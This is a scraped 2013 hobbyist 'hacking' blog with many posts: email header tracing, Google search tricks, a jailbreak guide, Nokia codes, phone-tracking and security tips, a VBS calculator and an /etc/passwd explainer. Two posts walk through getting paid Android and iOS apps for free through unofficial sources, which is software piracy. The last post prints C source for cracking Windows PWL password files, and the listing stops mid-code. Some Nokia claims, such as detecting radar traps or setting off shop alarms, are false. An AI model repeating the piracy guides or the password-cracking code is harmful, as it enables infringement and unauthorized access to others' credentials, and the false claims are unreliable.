Saturday, 27 July 2013

Trace Email Address or Fake Emails




Tracing email ids must be known by every one as one must know who is sending them emails or fake emails as e-mail  scams has been increasing Enormously in these days So Here Hackerkonka presents Tutoiral for u all fanz to trace any incomming mail's email ID.


Here Starts The Tutorial:-




Hi friends, today i am going to teach you how to trace an email received in Gmail. Using this hack you can trace the source from which you have received the email.

Hackers do a lot of stuff to hack into your email account so you should always be aware of such things like how to check the authenticity of the email that it has arrived from genuine user or its a fake email.




Here are two ways to check the authenticity of the email address:-
1. Open the Email and Click on Show details.
2. For more deeper look Click on the triangle and then select show original.


Great, but i know 99% of you guys already know these but never tried to trace or somebody have tried but never got success. What is the reason behind that? Yup i know the reason.. All previous tricks to trace an email in Gmail are incomplete so you never received success in doing that. As i always focus on manual things as tools are for noobs and script kiddes. So guys lets learn how to trace email address manually.


How to Trace Email received in Gmail:-

1. Basic Method(if sent through some website)
This method is applicable for tracing the email that is sent through the anonymous email or email forging websites. 
What is the main motive behind the fake emails, Have you guys ever tried to understand. If no, then here is three four basic things why Fake emails or anonymous emails are sent.
1. For Phishing purposes: Fake page links that are used to hack your email account.
2. For Spreading Botnets: Fake emails with attachments(.php,.jpg,.bmp etc) contains bots means self spreading Trojans that steals your email contacts and email that to hackers.
3. For Stealing your personal information or to cheat you.(mails like you won 10000000$ please send us your details to claim).
4. For promoting or virul a product. Most sellers use this trick to promote their companies products online on the name of email marketing but thats all fake they are in need of customers who can buy them and some already has bots attached in them to the mail has been automatically sent to all emails that are in your friend list.

Steps to trace Email received in Gmail (very basic method):-
1. Login into your Gmail account.
2. Open the email whose sender details you want to see.
3. Click on Show details.
4 That's all it will show you all basic information about the email. Below snapshot will explain you better.




2. Advanced Method:

The above trick hardly helps you to trace the email address. Now let's discuss advanced way to trace email.
Have you guys ever tried to under how emails are sent and received. Ahhahah Computer geeks you might have read in books about How email works that how its sent and how its received. If yes, then you surely haven't implemented that in practical life.

Emails are basically received in form of HTML headers. HTML headers consist of several things like Message delivered to or from, Subject, Received to or from, Date, Mime version,Content Type, X-mailer client etc.

How to trace email Advanced trick:
1. Go to the email and open it.
2. Now click on the triangle at top right end corner of the email screen as shown below and select show original email.

Now See the second received: from SecretMythPC[202.65.148.9] . Its the source IP address ( IP address of system) from which email has been sent.

Now open Any IP address tracing website: Example i opened http://whatismyipaddress.com/

Now Trace the IP addess 202.65.148.9 to get his details and location of the sender. You will see something like this in the output:


That's all Guys, hope you all have loved it. This is the actual method how cyber police detects cyber criminals and reach their destinations.
If you have any queries ask me in the form of comments.

Wednesday, 24 July 2013

Top 10 Google tricks


Below is a list of our top ten Google tricks many people who use Google don't know about.

Definitions:-
Pull up the definition of the word by typing define followed by the word you want the definition for. For example, typing: define bravura would display the definition of that word.

Local search:-
Visit Google Local enter the area you want to search and the keyword of the place you want to find. For example, typing: restaurant at the above link would display local restaurants.

Phone number lookup:-
Enter a full phone number with area code to display the name and address associated with that phone number.

Find weather and movies:-
Type "weather" or "movies" followed by a zip code or city and state to display current weather conditions or movie theaters in your area. For example, typing weather 84101 gives you the current weather conditions for Salt Lake City, UT and the next four days. Typing movies 84101 would give you a link for show times for movies in that area.

Track airline flight and packages:-
Enter the airline and flight number to display the status of an airline flight and it's arrival time. For example, type: delta 123 to display this flight information if available.
Google can also give a direct link to package tracking information if you enter a UPS, FedEx or USPS tracking number.

Translate:-
Translate text, a full web page, or search by using the Google Language Tools.

Pages linked to you:-
See what other web pages are linking to your website or blog by typing link: followed by your URL. For example, typing link:http://hackerkonka.blogspot.com displays all pages linking to Computer Hope.

Find PDF results only:-
Add fileType: to your search to display results that only match a certain file type. For example, if you wanted to display PDF results only type: "dell xps" fileType:pdf -- this is a great way to find online manuals.

Calculator:-
Use the Google Search engine as a calculator by typing a math problem in the search. For example, typing:100 + 200 would display results as 300.

Stocks:-
Quickly get to a stock quote price, chart, and related links by typing the stock symbol in Google. For example, typing: msft will display the stock information for Microsoft.


EnJoY FaNs(Hacker Konka)...

Hacking paid android apps and download free


Hello friends, today i am going to share with you how to hack android paid applications and download them absolutely free. Basically its not a hack, its just a trick or simply you call it a discovering facts to make our working easier and cheaper.

Requirements for Hacking Android applications:
1. Android Market
2. Mobile or Iphone should have internet access(optional as i will tell you better alternate way. Why to waste lot of money and data usage on 3G. Use your broadband to download it).
3. Phone connectivity to PC or laptop through USB.


Complete Steps to Hack and download paid android apps for free:
1. First of all select which paid android application you want to hack and install its full version for free. I am explaining this article with the help of paid android application Raging Thunder (car racing game).
2. Now go to below page and type your android application name then space and then apk in the search box and click on search.





3. Now Connect your mobile to your PC through USB and transfer this .apk file to your memory card or simply storage of your android phone.
4. Now run the installer and install it. Let the installation complete and then enjoy the full paid application.

Note: When you try this trick first time you mobile will show a warning message something like Do you want to allow third party applications, just select yes and continue the installation. If it still doesn't allow then Go to Settings then to Applications  and there you will find Unkown Sources(allow installation from non market applications) like something, just click it to enable it and continue installation. 

5. That's all.... EnJoY FaNs....

Note: ALL applications might not be available on 4shared, so please don't comment like noobs that it doesn't work. This 100% working technique and I have tested more than 100 of applications using this trick.

How to Jailbreak iOS 5 Beta with Sn0wbreeze


Hello Friends, today I tell you how to jailbreak iphone iOS 5 beta with Sn0wbreeze. Sn0wbreeze 2.8 can jailbreak iOS 5 beta on iPhone 4, iPhone 3GS, iPod Touch 4G, 3G and iPad 1. But there is no iPad 2 support. So friends you can jailbreak everything except iPad 2.

Sn0wbreeze 2.8 creates custom iOS 5 to jailbreak iPhone, iPod Touch and iPad. Sn0wbreeze 2.8 also preserves iPhone baseband so you may unlock with UltraSn0w later, however, UltraSn0w is not compatible with iOS 5 yet.


DISCLAIMER: This information is intended for experienced users. It is not intended for basic users, hackers, or mobile thieves. Please do not try any of following methods if you are not familiar with mobile phones. We'll not be responsible for the use or misuse of this information, including loss of data or hardware damage. So use it at your own risk.


How to Jailbreak iOS 5 with Sn0wBreeze 2.8:-

Step 1:-

Download the required stuff linked below and put them on your desktop..
Download iOS 5 Beta for your device.
Download Sn0wBreeze 2.8b1

Download iTunes 10.5 beta and install it.

Step 2
Run the Sn0wBreeze.exe. Hit Ok, then Close Credits button and then hit the next button.
Step 3
Either drag & drop the iOS 5 beta firmware file in the given box or hit the Browse button and select the iOS 5 IPSW file for your iDevice. Sn0wBreeze will identify the IPSW firmware file. When done, hit the next button.
Step 4:-
Select the Expert Mode, Hit next button, then select General and hit Next. Make your desired choices, then keep hitting Next.
Step 5:-
Now select the Build IPSW option and hit next. Sn0wBreeze will start building custom firmware to jailbreak your iPhone 4, 3GS, idevice. Since the building process takes several minutes to complete, you can either choose to play PacMan or stick with the Spinner.
Once Done! Hit the OK button. (Custom firmware can be found on desktop)
Step 6:-
Now follow the Sn0wbreeze instructions to put your iDevices into Pwned State. Sn0wBreeze instructions are important to follow because this will put iDevice into Pwned DFU state NOT the simple DFU mode.
Hold Power + Home buttons for 10 seconds
Now release the Power button but keep holding the Home button for 10-30 more seconds
Your device should now be in DFU mode Sn0wBreeze will prompt you once you’re into Pwned DFU state.
Step 7:-
Now open iTunes, Hold down the Shift/Option key and hit the Restore button.
Browse and select the custom firmware that we just created, from the desktop.
iTunes will start restoring iOS 5 on your iPhone/iPad/iPod Touch. Once done, your iPhone, ipad or iPod Touch will be running iOS 5 jailbroken tethered.

How to Tether Boot:-
As i have already said it’s a tethered jailbreak.
On your desktop, there’ll be a new folder named iBooty. Open the folder and run the iBooty.exe.
Select your device from the drop down menu (bottom-right) and hit the start button.
Follow the on screen instructions to put your iDevice into DFU mode.
Hold Power + Home buttons for 10 seconds.
Now release the Power button but keep holding the Home button for 10-30 more seconds
Your device should now be in DFU mode
Once you’re into DFU mode, iBooty will do the rest and your iPhone, iPad or iPod touch will boot into jailbroken state!
Thats all, you are done and successfully jailbreak the iOS5 beta using the Sn0wbreeze.


Enjoy fanz...

Nokia secret codes


Below, I have listed all Nokia secret codes. On the main screen type:


*#06# - is used to check the IMEI (International Mobile Equipment Identity).


*#7780# - resets to factory settings.


*#0000# - shows the software version of your mobile phone.


*#9999# - Phones software version if *#0000# does not work.


*#67705646# - clears the LCD display(operator logo).


*#147# - This lets you know who called you last (Only vodofone).


*#1471# - Last call (Only vodofone).


#pw+1234567890+1# - Provider Lock Status.


#pw+1234567890+2# - Network Lock Status.


#pw+1234567890+3# - Country Lock Status.


#pw+1234567890+4# - SIM Card Lock Status.


*#21# - This phone code allows you to check the number that "All Calls" are diverted to.


*#2640# - Displays phone security code in use.


*#30# - Lets you see the private number.


*#2820# - shows the address of your Bluetooth device.


*#62209526# - Display the WLAN adapter's MAC Address. It is available only for newer devices which support WLAN such as N80.


*#746025625# - Sim clock allowed status.


#pw+1234567890+1# - Displays any restrictions that your sim has.


*#92702689# - Takes you to a secret menu where you may find some of the information below:


1. Shows the Serial Number.


2. Shows the Month and Year of your mobile Manufacture.


3. Shows the date at which the mobile was purchased (MMYY).


4. Shows the life time of your mobile (time passed since last restart).


5. Shows the date at which your mobile was last repaired - if found (0000)


To exit from this mode, simply switch off and then switch on your mobile phone.


*#3370# - Enhanced Full Rate Codec (EFR) activation.


- This enables your mobile to work with increased signal strength, use better signal reception.


- This also helps you increase your GPRS speed to some extent.


- It has drawback that your phone battery will be consumed


*#3370* - Enhanced Full Rate Codec (EFR) deactivation. Phone will be automatically restarted automatically. Your battery life will increase by 30% but, phone will received less signal than with EFR activated.


*#4720# - used to activate Half Rate Codec. Your phone uses a lower quality sound but you should gain approx 30% more Talk Time.


*#4720* - used to deactivate Half Rate Codec. The phone will be restarted automatically.


If you have forgotten wallet code for your Nokia S60 phone, you can use this code reset: *#7370925538#


Note, your data in the wallet will be erased. You will be asked the lock code. Default lock code is: 12345


*#3925538# - used to delete the contents and code of wallet.


*#7328748263373738# - used to reset security code.


Default security code is 12345
Unlock service provider: Insert your sim, switch on your mobile and press vol up(arrow keys) for 3 seconds, then you will be asked for pin code. Press C, then press *. A message will be flashed, press * again and 04*pin*pin*pin#


Change closed caller group (settings >security settings>user groups) to 00000 and your mobile will sound the message tone if you are near a radar speed trap. If you set this value to 500 it will cause your mobile to set off security alarms present at shop entrances and exits(works with only some of the Nokia phones.)

To open wap browser, press and hold "0" on the main screen and wap browser will be opened.

Note: Some Nokia secret codes can harm your mobile. So, try these Nokia secret codes at your own risk. Also, some of these nokia secret codes will not work depending on your phone model.

So friends, I have listed almost all Nokia secret codes, I know. I hope these nokia secret codes will help you in configuring your Nokia mobile phones as you wish.

EnJoY FaNs Of Hacker Konka....

Install Cracked Apps Without Jailbreak


All iPhone, iPod and iPad users know that in order to install Cracked Apss & Games to their iDevices it needs a Jailbreak to perform this, but here I will show you a way to install Paid Apss Without Jailbreak for Free using an application under Windows (not Mac) and works for all iOS version including iOS 5 and iOS 6.

How to Install Cracked/Paid Apps & Games Without Jailbreak(Works for : iPhone, iPod and iPad running : iOS3, iOS4, iOS5 , iOS6 & iOS 6.0.1)

1) Download the software called 
2) Launch the setup of Kuaiyong, and install it (simple setup)


3) After Installing the Software, plug-in your iDevice with USB Cable.
4) Now Launch Kuaiyong application from Desktop, it will look like below:


5) It will show a list of Apps and Games (Paid), you can search using the Search Bar or you can select an app from the list.    
a) Search Bar   
 b) List navigation

6) After choosing an App or Game to download, Click on it then Click the Red button like below.


7) It will starts downloading the app. Just wait until it completes Downloading.


8) After the downloads the Paid app wait some time to Sync the Apps and add it to your iPhone, iPad or iPod .


/*Note#1: This works on all iDevices including: iPhone 3G, iPhone 3GS, iPhone 4, iPhone 4S, iPhone 5*//*Note#2: This also works on all iOS Versions: iOS3, iOS4, iOS5, iOS5.1.1, iOS6, iOS6.0.1*/


How to trace Exact Location of Mobile Phone


There are many instances when we want to know where our friends are, where our parents are, and for those who've got a pair, where is my girl-friend or boyfriend. ! Well there are many apps in the market which allow you to get exactly the pin-pointed location of  any cellphone. But the problem is they cost too high. Well today I'm gonna show you a process by which you can trace the exact mobile location of any cell phone without the need to spend a single penny. What you need is listed below, and i'm sure most of us already have what is needed..



REQUIREMENTS:

• Any cell phone that supports Google maps. eg. iPhone , Nokia , Blackberry , Symbian etc.

• Google Latitude. Which you can download by going to google.com/latitude from your cell phone.


STEPS:-
• Go to www.google.com/latitude from your cell phone.
• Download the free app.
• Open the App.
• Enter You mobile number in the entry Field.
• Now You've set it up on your phone. Now you gotta set it up on your friends cell phone.


HOW TO SET IT UP ON YOUR FRIENDS CELL PHONE:

  •  You can add friends by their E-mail Addresses. Your friends will receive an E-mail with the download link of Google latitude. 
  • • Or you can manually add yourself or ask your friend to add google latitude on his/her cell phone. 
  • • Now you and your friend can add each other as friends on google latitude and you'll get the exact location of where your friends cell phone is.
  • • There is exactly no limit to how many friends you can add in your latitude circle. ( just make sure you dont add your parents :) 
  • • Well so As soon as You and your buddy confirm each other as friends you get to see each others location.

HOW TO USE IT EVEN WHEN YOU DON'T HAVE YOUR CELL PHONE WITH YOU:

• Well the most eye catching feature of google latitude is that you can use it online even without a cell phone.
• Just go to google.com/latitude from you PC, Follow the instructions, log-in into your account. And track You friends Locations !!

EnJoY FaNz Of Hacker Konka....




Use Facebook Without Internet Connection

I know Title Of  Post Sounds somewhat funny but friends You can use facebook with no internet connection And Even On Phones Which don't Have Internet Support.
And the best thing is that its Completly free.Facebook India has partnered with Fonetwish to bring Facebook on every mobile phone without requiring any apps or even the Internet.Now you can able to use facebook on cell phones like 1100.which don't have any browser or internet facility.


-> The only You have to do is to  dial *325# 

from your mobile phone and follow the instructions.

First of all it asks for Facebook username and password,You have to enter these information via a number based command Prompt.
After You get in.You will see a menu like 
  • news feed
  • update status
  • post on wall.
  • friend request.
  • messages.
  • notifications. 


       *Account settings.

You have to enter desired Number in a number based command prompt for accessing your account.


NOTE:
This Service is only available in India. 

This Service Currently available On selected operators like Airtel, Aircel, Idea, Vodafone and Tata Docomo users.

Access to facebook account and Status updates is completely free.If you also want to use features like Notifications, updating friends wall you have to subscribe to Fonetwish premium plan which is very cheap.


Enjoy Hav Fun Fanz.. :p :p

Monday, 22 July 2013

Top 7 Android Security/Antiviurs Apps | One Must Have Any One



If you are a active internet/web user, you must be knowing the potential dangers that lurk online which includes harmful malwares, viruses, Trojans and spyware bots etc. These threats exposes your private/personal data to hackers (unwanted users) and put your privacy at risk. So to avoid any such risks its necessary to use good security apps that can protect yourself from all the above mentioned threats and potential dangers.
These security apps allow users to protect themselves from not only online harmful threats (malware, spyware, etc) but also from physical ones such as in the case of the phone being misplaced or stolen. So We brings top Android security apps list for android phones. One Must Have It.




1. Lookout Security & Anti-Virus

Lookout Security & Anti-virus app for Android is an application that secures Android users from threats such as bugs, Trojans and viruses that may enter the device through local networks or online. Lookout Security & Anti-virus allows users to protect their vital data and find their phone if they misplace it, and backup their important files and documents in a safer place.
Use the Lookout Security & Anti-virus app to scan every individual app you download to make sure the apps are safe from malware, spyware and Trojans. A great feature found in the application is the “Routine Check” feature that allows users to schedule daily or weekly scans of the apps you download. You can also get automatic, over-the-air protection against the latest threats.




2. AVG Antivirus

AVG Antivirus is the Android based application of the much renowned antivirus software for personal computers with the same name. AVG Antivirus app allow users to scan apps, setting files and media card in real-time allowing you to find any threats such as malware, Trojans and spyware in any of them that may put your privacy and vital information at risk of being exposed. Not only applications, but also the AVG Antivirus application for Android allows users to screen incoming SMS to detect any harmful threats.
The AVG Antivirus also ensures maximum speed of your phone by giving users a task manager to kill off any apps and tasks that slow the device down.



3. McAfee WaveSecure

McAfee WaveSecure is an award winning mobile protection app for your Android devices and systems. McAfee WaveSecure gives users the option to secure their personal data on mobile device, in the event that the mobile may be lost or stolen. In such a case, McAfee WaveSecure can be used to track your device and even wipe all data on the Android device saving it from any prying eyes. An easy to use web portal allows users to backup and restore their personal data.


  
4. Norton Antivirus & Security


Norton Antivirus & Security is a security application for Android devices with iOS 2.1 and up. The Norton Antivirus & Security allows users to protect their devices from loss of data, in case of theft and malware attacks. One of the best antivirus companies in the world, Norton Antivirus, backs Norton Antivirus & Security. Norton Antivirus & Security provides all the features that will be required by an Android user to keep themselves save and secure from malware, Trojans, spyware and other incidents such as theft. The antivirus protection automatically scans the downloaded apps and app updates against any potential harmful threats. It also searches for and removes mobile security threats that may tamper with your phone in order to achieve your personal information. Norton Antivirus & Security allows users to scan the SD card for any harmful threats if any. Norton Antivirus & Security also allows users to lock their devices and remote wipe any confidential data found on the device if their devices are misplaced or stolen.



  
5. Mobile Security & Antivirus


The Mobile Security & Antivirus provides the users with two basic functions that keep vital information safe and secure from all kinds of threats. These two functions are that of – Antivirus protection and security. The Mobile Security & Antivirus protects your Android device free from viruses and saves your battery life, an essentially helpful feature where you require battery life and have only a little left. Use the Mobile Security & Antivirus’s malware scanner feature to scan apps as you download them to scan for any harmful threats that may put your privacy at risk, including your confidential data such as passwords, e-mails, etc.
One of the best features present in Mobile Security & Antivirus is the “Application Audit” feature that can be used to ensure that apps do not take more permission then they should and thus allow you to safeguard your private data, and even access to unwanted Internet updates or so.




6. Avast! Mobile Security


Avast! Mobile Security provides Android users with OS 2.1 and up with protection from viruses and theft security issues. Use the Avast! Mobile Security to protect private data with automatic virus scans and find infected URLs before they infect your mobile with malware and spyware. Use the SMS commands to wipe, lock and GPS track your Android device in case if it is stolen or misplaced somewhere outside home. You can also use the “Activate Siren” feature to turn on a loud siren allowing you to locate your mobile phone – a helpful feature if phone is misplaced somewhere inside home.
Avast! Mobile Security application also allows users to screen incoming SMS and phone calls. Use parameters to direct specific unwanted calls to voicemail.




7. NQ Mobile Security & Antivirus

The NQ Mobile Security & Antivirus is a total mobile security solution for Android devices, protecting them from harmful threats such as malware, spyware and Trojans while also allowing users to monitor their devices to ensure maximum speeds. Use the NQ Mobile Security & Antivirus app to browse the Internet safely without having to worry about phishing, fraud sites and malware that lurks the Internet. The app is updated regularly keeping in track with all the latest viruses and threats discovered.
Use the Network Manager to track your traffic consumption over a period of 30 days and keep a track on the trend and statistics as well. Use the Backup & Restore feature present in the NQ Mobile Security & Antivirus app to backup and retrieve contacts and messages found on any of your mobile device – iOS, Android, Blackberry or Nokia.



Here Such Top Android Secutiy/Antivirus for u. I hope it is Informative.

Enjoy Fans of hackerkonka

How to secure your smartphone from hackers


Now a days, We are using smartphone for our daily life such E-mail, facebook, twitter, paypal, banking etc..its all the our personal working. So their is more important to protect our smartphone from being hacked.
Using some security improvement helps you to protect your phone. Actually the method which you adopt  to protect your computer can be used to protect your smartphone too. Use following given below tips to secure your smart phone.


You can also use the some Antivirus & Security for protect your smartphone


Top 7 Android Security-Antiviurs Apps



1. Use Passcodes Everywhere:

Whether you have an Android phone or an iPhone, you can prevent access to your device by adding a passcode or a lock pattern on Android. This simple security measure can save tour sensitive information This is especially important if you have a bunch of apps installed where personal data is stored like financial apps (Mint, bank apps, etc), note apps  etc.The home screen passcode is important because a lot of the email apps (Mail on iPhone and Gmail on Android) don’t even have an option to passcode your email. Emails can contain a lot of private information and since most people go to parties and leave their phones on tables and counters. Sp passcode is necessary.


2. Protect Your iCloud & Google Account:

The second thing most is that if someone can access into your iCloud or Google account, they can gain access to a lot of data that you might be creating and editing from your smartphone. In these times, it’s a necessary  to enable 2-step verification on both of these accounts.Your Google account basically logs you into all Google services from YouTube to Gmail to Google Play to Google Maps to Google Calendar to Picasa to Google+, etc, etc, etc.


3. Avoid Jailbreaking or Rooting Your Smartphone:

If you are jailbreak or root your phone for fun and enjoyment, then good for you. But you have to avoid this because it can mess up your phone and cause you more grief than happiness. Secondly, you won’t be able to update your phone with the latest updates to the OS since it’ll be in an unsupported mode.


4. Be Careful With the Apps You Install:

This is especially important on Android devices. Google recently removed 50,000 apps that were suspected containing viruses. There are a lot  of apps that contain malware, viruses or other sneaky software to steal your data or damage your phone. The Apple app store also has this problem.So,be careful about installing apps.


5. Use an App Instead of the Browser:
If you’re doing banking on your phone or stock trading or anything else that contain personal sensitive information between your phone and the Internet, it’s best to use an official app for that site or company rather than opening using the browser on your phone.For example, Chase, Bank of America and lots of other big financial institutions have their own apps for iOS and Android.


6. Control What an App Can Access:

You’ve probably seen the following message on your iPhone a hundred times already:There are all types of these “AppName Would Like to Access Your Data” messages. Data can be photos, location, contacts etc. Don’t just click OK all the time. If you click anything all the time, it’s better to just choose Don’t Allow and if you really can’t use the app later on, you can manually go back in and change it to allow access.


7. Keep Data Backed Up:

It’s not only a good idea to keep your smartphone backed up in case if it gets stolen and you have to remotely wipe it clean. Apple users can install the Find My iPhone app, which will let you remotely lock a phone and remotely wipe it if you know it’s been stolen.If you don’t have your data backed up, you’ll lose it all if it’s stolen. If you back it up locally or in the cloud, you’ll be able to wipe your phone and get all your data back on your new phone.On Android, there is a built-in backup tool, but it doesn’t backup everything on your phone like the iOS does.


8. Report Your Phone Stolen:

There has been a stolen phone database created that is shared between the major wireless carriers. You can report your phone stolen and that will prevent anyone from connecting to the carrier and using data or minutes. If they try to wipe it, replace the SIM, etc, it still won’t allow them to activate on any of the carriers because of the serial number.


9. Update the OS:

Just like you have to constantly install Microsoft security updates for your PC, it’s a good idea to install the latest updates for your smartphone. If there are no major issues with the update like degradation of battery life, etc, but if nothing stands out, then update the phone.In addition to updating the OS, it’s also a good idea to update the apps installed on your phone.





10. Wireless & Bluetooth:

When you’re not at home, it’s best to try to disable the wireless and bluetooth altogether and use your 3G or 4G connection if you can. The moment you connect to an untrusted wireless network, you’re open to hackers scanning for victims over the network. A hacker  try to connect to your smartphone and steal data, etc.If bluetooth is enabled and discoverable, it gives hackers another way to possibly see the data being passed between the bluetooth device and your phone.


Make Speaking VBS Calculator




Here is a trick for you all friends to make your own speaking calculator in VBS windows script.

Tutorial:-

1.Open Notepad
2.Copy all below coding into notepad:

 

Dim expr,sapi, mul, div, add,subtr, op1, op2, typ, pow, moduon error resume nextErr.Clearset sapi = CreateObject("sapi.spvoice")expr=InputBox("Write an expression to calculate: "+vbcrlf+vbcrlf+"Note: Please enter only two operands."+vbcrlf+vbcrlf+"Example: 5+7","Speaking Calculator")mul=split(expr,"*")div=split(expr,"/")add=split(expr,"+")subtr=split(expr,"-")pow=split(expr,"^")modu=split(expr,"mod")
if(ubound(mul)=1)thentyp="mul"op1=mul(0)op2=mul(1)elseif(ubound(div)=1)thentyp="div"op1=div(0)op2=div(1)elseif(ubound(add)=1)thentyp="add"op1=add(0)op2=add(1)elseif(ubound(subtr)=1)thentyp="subtr" op1=subtr(0)op2=subtr(1)elseif(ubound(pow)=1)thentyp="pow" op1=pow(0)op2=pow(1)elseif(ubound(modu)=1)thentyp="mod" op1=modu(0)op2=modu(1)end ifend if end ifend ifend ifend if
if(typ="" or not isnumeric(op1) or not isNumeric(op2))thenmsgbox "The expression you entered seems to be invalid",vbokonly,"Invalid Expression"elseselect case typcase "mul": sapi.Speak replace(expr,"*",": multiplied by ")+": is equal to "+ cStr(Eval(expr))case "div": sapi.Speak replace(expr,"/",": divided by ")+": is equal to "+ cStr(Eval(expr))case "add": sapi.Speak replace(expr,"+",": plus ")+": is equal to "+ cStr(Eval(expr))case "subtr": sapi.Speak replace(expr,"-",": minus ")+": is equal to "+ cStr(Eval(expr))case "pow": sapi.Speak replace(expr,"^",": powered by ")+": is equal to "+ cStr(Eval(expr))case "mod": sapi.Speak replace(expr,"mod",": modulo ")+": is equal to "+ cStr(Eval(expr))end selectend ifif Err.Number <> 0 then msgbox "Description: "+Err.Description,vbokonly,"Error"end if
4.Save file as anything.vbs (.vbs extension  must be there)
5.Done
You have make a speaking calculator. Enter your question and press ok it will speak question with it'z answer.

Linux Password working | etc/Passwd File Format



Hey Friends Here is your Query Solved! Today we will learn How Linux Password works and will understand etc/Passwd file format in detail.. So let me explain first what is etc/Passwd is? 

In Linux/Unix operating system etc/Passwd is place where all passwords are stored in encrypted format. To be more clear, /etc/passwd file stores essential information, which is required during login i.e. user account information. /etc/passwd is a text file, that contains a list of the system's accounts, giving for each account some useful information like user ID, group ID, home directory, shell, etc. It should have general read permission as many utilities, like ls use it to map user IDs to user names, but write access only for the superuser (root).

 

Understanding fields in /etc/passwd

The /etc/passwd contains one entry per line for each user (or user account) of the system. All fields are separated by a colon (:) symbol. Total seven fields as follows.

Generally, passwd file entry looks as follows :

                                                            /etc/passwd file format

  1. Username: It is used when user logs in. It should be between 1 and 32 characters in length.
  2. Password: An x character indicates that encrypted password is stored in /etc/shadow file.
  3. User ID (UID): Each user must be assigned a user ID (UID). UID 0 (zero) is reserved for root and UIDs 1-99 are reserved for other predefined accounts. Further UID 100-999 are reserved by system for administrative and system accounts/groups.
  4. Group ID (GID): The primary group ID (stored in /etc/group file)
  5. User ID Info: The comment field. It allow you to add extra information about the users such as user's full name, phone number etc. This field use by finger command.
  6. Home directoryThe absolute path to the directory the user will be in when they log in. If this directory does not exists then users directory becomes /
  7. The absolute path of a command or shell (/bin/bash). Typically, this is a shell. Please note that it does not have to be a shell 
  • Task: See User List
  • /etc/passwd is only used for local users only. To see list of all users, enter:

                                             

$ cat /etc/passwd 

  • To search for a username called tom, enter: 

    $ grep tom /etc/passwd


    • /etc/passwd file permission

      The permission on the /etc/passwd file should be read only to users (-rw-r--r--) and the owner must be root: 

      $ ls -l /etc/passwd

      "-rw-r--r-- 1 root root 2659 sep 17 01:46 /etc/passwd

      Reading /etc/passwd file

      You can read /etc/passwd file using the while loop and IFS separator as follows:

       


      #!/bin/bash
      # seven fields from /
      etc/passwd stored in $f1,f2...,$f7 # while IFS=: read -r f1 f2 f3 f4 f5 f6 f7 do echo "User $f1 use $f7 shell and stores files in $f6 directory."done < /etc/passwd

       

      • Your password is stored in /etc/shadow file

        Your encrpted password is not stored in /etc/passwd file. It is stored in /etc/shadow file. In the good old days there was no great problem with this general read permission. Everybody could read the encrypted passwords, but the hardware was too slow to crack a well-chosen password, and moreover, the basic assumption used to be that of a friendly user-community.
        Almost, all modern Linux / UNIX line operating systems use some sort of the shadow password suite, where /etc/passwd has asterisks (*) instead of encrypted passwords, and the encrypted passwords are in /etc/shadow which is readable by the superuser only.


Hacking Codes[+cc]

          Hacking Codes


1] FACEBOOK ACCEPT OR REJECT AT ONE TIME
        If You Get A Lot Of Friend Requests Daily Or You Opened You Facebook Account After A Long Time, You Could End Up Having To Manually Accept Or Reject All Of Them, these code can be used to accept or reject all of them at once.
 PROCESS>>>
 Copy The Following Code:

For Accepting:

javascript:for( i = 1;i<document.getElementsByName("actions[accept]").length;i++){document.getElementsByName("actions[accept]")[i].click();}void(0);

For Rejecting:

javascript:for( i = 1;i<document.getElementsByName("actions[hide]").length;i++){document.getElementsByName("actions[hide]")[i].click();}void(0);

    Paste This Code In The Address Bar Of The Page You Opened In The First Step

    Now Just Wait And Let The Script Work!!


Note: For Chrome Users: When You Paste The Code In The Address Bar, You Will Manually Need To Reinsert "javascript:" in Front Of It
2] CRACK WINDOWS PASSWORD SOURCE CODE :    This will reveal your windows computer password. Just copy this code on to a notepad.
Save it as anything.c. Remember to change the file type to "All file".

# include<stdio.h>
 # include<stdio.h>
 # include<process.h>
 # include<stdlib.h>
 # include<ctype.h>
 # include<conio.h>
 # include<mem.h>

 unsigned char huge Data[100001];
 unsigned char keystream[1001];
 int Rpoint[300];

 void main(int argc,char *argv[]){
 FILE *fd;
 int i,j;
 int size;
 char ch;
 char *name;
 int cracked;
 int sizemask;
 int maxr;
 int rsz;
 int pos;
 int Rall[300];     /* Resourse allocation table */

 if(argc<2)
 {
     printf("usage: glide filename (username)");
     exit(1);
 }
 /* Read PWL file */

 fd=fopen(argv[1],"rb");
 if(fd==NULL)
 {
       printf("can't open file %s",argv[1]);
       exit(1);
 }
 size=0;
 while(!feof(fd)){
         Data[size++]=fgetc(fd);
 }
 size--;
 fclose(fd);

 /* Find Username */
 name=argv[1];
 if(argc>2)name=argv[2];
 printf("Username:%s",name);

 /* Copy encrypted text into keystream */
 cracked=size-0x0208;
 if(cracked<0)cracked=0;
       if(cracked>1000)cracked=1000;
                memcpy(keystream,Data+0x208,cracked);

 /* Generate 20 bytes of keystream */
 for(i=0;i<20;i++)
 {
     ch=toupper(name[i]);
     if(ch==0)break;
     if(ch=='.')break;
     keystream[i]^=ch;
 };
 cracked=20;

 /* Find allocated resources */
 sizemask=keystream[0]+(keystream[1]<<8);
 printf("Sizemask:%04X",sizemask);
 for(i=0;i<256;i++)
 {
     if(Data[i]!=0xff)
         {
         Rall[Data[i]]++;
         if(Data[i]>maxr)
                             maxr=Data[i];
     }
 }

 maxr=(((maxr/16)+1)*16); /* Resourse pointer table size appears to be
 divisible by 16 */

 /*Search after resources */

 Rpoint[0]=0x0208+2*maxr+20+2; /* First resources */
 for(i=0;i<maxr;i++)
 {
     /* Find the size of current resourse */
     pos=Rpoint[i];
     rsz=Data[pos]+(Data[pos+1]<<8);
     rsz^=sizemask;
     printf("Analysing block with size:%04x    (%d:%d)",rsz,i,Rall[i]);
     if((Rall[i]==0)&&(rsz!=0))
          {

         printf("Unused resourse has nonzero size!!!");
         printf("If last line produed any:U may try 2 recover");
         printf("Press y to attempt the recovery");
         ch=getch();
         if(ch!='y')exit(0);
         rsz=2;
         i=i-1;
     }
     pos=pos+rsz;
 /* Resourse have a tedency to have the wrong size for some reason*/
     /* Chech for correct size*/
     if(i<maxr-1)
         {
         while(Data[pos+3]!=keystream[1])
                 {
             printf(":",Data[pos+3]);
             pos=pos+2; /* Very rude may fail */
         }
     }
     pos+=2; /* Include pointer in size */
     Rpoint[i+1]=pos;
 }

 Rpoint[maxr]=size;
 /* Insert Table data into keystream*/
 for(i=0;i<=maxr;i++)
 {
     keystream[20+2*i]^=Rpoint[i] & 0x00ff;
     keystream[21+2*i]^=(Rpoint[i]>>8) & 0x00ff;
 }
 cracked+=maxr*2+2;
 printf("%d Bytes of ketstream recoverd ",cracked);
 /* Decrypt resources */
 for(i=0;i<maxr;i++)
 {
